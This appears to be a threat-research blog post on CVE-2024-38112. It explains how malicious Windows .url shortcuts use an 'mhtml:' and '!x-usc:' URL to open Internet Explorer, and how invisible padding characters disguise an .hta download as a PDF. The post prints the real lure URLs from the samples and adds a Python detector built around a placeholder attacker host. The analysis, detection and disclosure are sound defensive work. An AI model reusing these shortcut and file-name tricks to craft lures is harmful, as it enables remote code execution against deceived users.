
Resurrecting Internet Explorer: Threat Actors Use Zero-Day Tricks in Internet Shortcut Files to Lure Victims (CVE-2024-38112)


By Haifei Li

Introduction and background

Check Point Research recently discovered that threat actors have been using novel (or previously unknown) tricks to lure Windows users into remote code execution. Specifically, the attackers crafted special Windows Internet Shortcut files (the .url extension name) which, when clicked, would call the retired Internet Explorer (IE) to open the attacker-controlled URL. An additional trick on IE is used to hide the malicious .hta extension name. By opening the URL with IE instead of the modern and far more secure Chrome/Edge browsers on Windows, the attacker gained a significant advantage in exploiting the victim's computer, even if the computer is running a modern Windows 10/11 operating system.

For some technical background, it is not uncommon to see threat actors using .url files as the initial attack vector of their campaigns. Even the use of novel or zero-day .url-file-related vulnerabilities has happened before: CVE-2023-36025, which was patched in November, is a good example.

The malicious .url samples we found range from January 2023 (many were seen in the past) to as late as May 13, 2024 (a few days ago, as of writing). This means that the threat actors have been using these attack techniques for a considerable time.

Reviving Internet Explorer via the "MHTML" Trick

Let's use the latest .url sample on VirusTotal to explain the technique.

Raw content of the sample:

Figure 1: Content of the malicious .url sample

As we can see, the last lines of the .url file point to a specific icon inside the Microsoft Edge application file msedge.exe, so the shortcut appears to point to a PDF document (although, in fact, it does not).

More importantly, the value of the URL keyword is rather different from the usual one. Typically, for a normal .url file, the URL parameter looks like URL=https://www.google.com, which opens the URL https://www.google.com. In this sample, however, the value is:

mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html

It uses a different prefix, mhtml:, and also a !x-usc: in the middle.

A few years ago, we saw the same trick (which we call the "MHTML" trick) in the infamous CVE-2021-40444 zero-day attacks, where the document.xml.rels file contained exactly this kind of string.

Figure 2: Key content in the CVE-2021-40444 exploit sample

We all know that the "mhtml" trick in Office documents was used back then to exploit the CVE-2021-40444 vulnerability, and now we see the same trick used in .url files as well. So, what can attackers achieve by using it? Let's do a little analysis.

If we name the sample Books_A0UJKO.pdf.url (its name in the wild), the .url file appears on a (fully patched) Windows 11 system as a shortcut to a PDF file.

Figure 3: The malicious .url file appears as a link to a PDF file on Windows 11

If we act as the victim (who wants to open the PDF) and double-click the shortcut file, the victim gets:

Figure 4: IE and a prompt dialog appear when the victim double-clicks the .url file

See what's unusual there? Internet Explorer is opened. In fact, with some debugging, we were able to confirm that IE was indeed used to open the link http://cbmelipilla(.)cl/te/test1.html specified in the .url file.

As we all know, Microsoft declared IE retired a few years ago. On a typical Windows 10/11 system, normal user actions such as browsing websites should not be able to open IE, because IE does not offer the same level of security as modern browsers. IE is an old browser and is well known for its lack of security, which is probably one of the main reasons Microsoft replaced it with the more modern and more secure Microsoft Edge, or why users simply dislike it and install and use Google's Chrome browser instead.

Note: Despite the fact that IE has been declared "retired and out of support", technically speaking, IE is still part of the Windows OS and is not "inherently insecure", as IE is still serviced for vulnerabilities, and based on our communication with Microsoft there should be no known exploitable security vulnerabilities.

Therefore, by default, users should not open websites with IE unless the user explicitly asks for that action and fully understands it.

In this sample, however, thanks to the "mhtml" trick, when the victim opens the .url shortcut (thinking they are opening a PDF), the attacker-controlled web page is instead opened with IE rather than with Chrome/Edge.

From there (the web page being opened with IE), the attacker can do many malicious things, because IE is old and insecure. For example, if the attacker has an IE zero-day exploit, which is much easier to find than one for Chrome/Edge, the attacker can immediately attack the victim to achieve remote code execution. However, the threat actors did not use any IE remote code execution exploits in the samples we analyzed. Instead, they used another trick in IE, one not previously publicly known to the best of our knowledge, to deceive the victim into triggering remote code execution.

Another IE Trick: Hiding the .hta Extension Name

Let's re-examine the earlier figure (highlighted below). According to the prompt (IE) dialog, it appears that the user is asked to open a PDF file named Books_A0UJKO.pdf.

Figure 5: A closer look at the IE dialog: only the PDF file name is visible

However, is that really the case? Are you really opening a PDF?

Not really. If we click "Open" (the default option) in the IE dialog above, we get another prompt dialog (see figure). This is due to IE's Protected Mode (a fairly weak browser sandbox).

Figure 6: IE Protected Mode warning dialog

If the victim ignores the warning (because they think they are opening a PDF), the victim's machine will eventually be compromised: the "opened" file is actually a malicious .hta file that is being downloaded and executed.

If we look carefully at the HTTP traffic, we find that many non-printable characters are appended after the Books_A0UJKO.pdf string. At the end, .hta is the actual (and dangerous) file name extension.

Figure 7: HTTP traffic showing the full URI visited

This is why the IE dialog did not show the .hta file name to the user. The actual full URL is:

https://cbmelipilla.cl/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80.hta

With this trick, the attacker is more likely to succeed in luring the victim to continue when, in reality, the victim is downloading and executing a malicious .hta application.
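The two tricks above (the mhtml:/!x-usc: URL value in the shortcut, and the invisible characters padded between .pdf and .hta) are both visible to a defender who parses the artifacts. The following detection helper is an added example written for this post, not code from Check Point Research; the shortcut and URL below are constructed samples in the shape of Figures 1 and 7, with a placeholder host instead of the real one.

```python
import re
from configparser import ConfigParser
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed .url file modelled on Figure 1 (placeholder host; the IconIndex
# value is a made-up example, only the shape of the URL= line follows the post).
SAMPLE_URL_FILE = """[InternetShortcut]
URL=mhtml:http://attacker.example/te/test1.html!x-usc:http://attacker.example/te/test1.html
IconFile=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
IconIndex=13
"""

# Constructed full URL in the shape of Figure 7: the .pdf name is followed by
# U+2800 BRAILLE PATTERN BLANK (UTF-8 E2 A0 80) repeated, then the real .hta.
SAMPLE_FULL_URL = "https://attacker.example/te/Books_A0UJKO.pdf" + "%E2%A0%80" * 26 + ".hta"

MHTML_RE = re.compile(r"^\s*mhtml:", re.IGNORECASE)
XUSC_RE = re.compile(r"!x-usc:", re.IGNORECASE)


def url_file_findings(text: str) -> List[str]:
    """Parse an Internet Shortcut (.url) file and return reasons to flag it."""
    cp = ConfigParser(interpolation=None)  # .url files are INI-style
    cp.read_string(text)
    findings: List[str] = []
    if not cp.has_section("InternetShortcut"):
        return findings
    url = cp.get("InternetShortcut", "URL", fallback="")
    if MHTML_RE.search(url):
        findings.append("URL uses mhtml: prefix (forces the target to open in IE)")
    if XUSC_RE.search(url):
        findings.append("URL contains !x-usc: separator (CVE-2021-40444-style)")
    icon = cp.get("InternetShortcut", "IconFile", fallback="")
    if icon.lower().endswith(".exe"):
        # Weak signal on its own: legitimate shortcuts also borrow exe icons.
        findings.append(f"IconFile borrows an icon from an executable: {icon}")
    return findings


def hidden_extension(url: str) -> Optional[Tuple[str, str]]:
    """Return (displayed_name, real_extension) when non-printing characters
    sit between a decoy extension and the real one; None for normal names."""
    path = unquote(url.split("?", 1)[0].split("#", 1)[0])  # decode %E2%A0%80 etc.
    name = path.rsplit("/", 1)[-1]
    # Middle group: one or more chars outside printable ASCII (U+2800, NBSP, RTLO, ...)
    m = re.match(r"^(.*?\.[A-Za-z0-9]{2,5})([^\x21-\x7e]+)(\.[A-Za-z0-9]{2,5})$", name)
    return (m.group(1), m.group(3).lower()) if m else None
```

Running `hidden_extension(SAMPLE_FULL_URL)` yields `('Books_A0UJKO.pdf', '.hta')`, which is exactly the mismatch the IE dialog in Figure 5 conceals.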


Protection and Mitigation

We have shown that the exploitation techniques described above, which have been actively used in the wild for at least a year, work on the latest Windows 10/11 operating systems.

Check Point protected its customers from this campaign months ago with an IPS signature called "Internet Shortcut File Remote Code Execution" on its IPS and Harmony Email products, providing protection against these zero-day attacks.

Harmony Email & Collaboration provides full inline protection against zero-day attacks at the highest security level.

We reported our findings to the Microsoft Security Response Center (MSRC) on Thursday, May 16, 2024. Since then, both parties have worked closely on the issue, resulting in Microsoft releasing a patch (CVE-2024-38112) on July 9. Windows users are strongly advised to apply the patch as soon as possible.

For concerned Windows users, we recommend being especially careful about .url files sent from untrusted sources. As we mentioned, this type of attack requires some user interaction.

Check Point Research continues to observe activity associated with this type of attack around the world.

Conclusion

To summarize the attacks from an exploitation perspective: the first technique used in these campaigns is the "MHTML" trick, which allows the attacker to invoke IE instead of the more secure Chrome/Edge. The second technique is an IE trick that makes the victim believe they are opening a PDF file when, in reality, they are downloading and executing a malicious .HTA application. The entire goal of these attacks is to make victims believe they are opening a PDF file, and this is made possible by the combination of these two techniques.

This post was published on 07/09/2024 3:52 pm

news2source.com
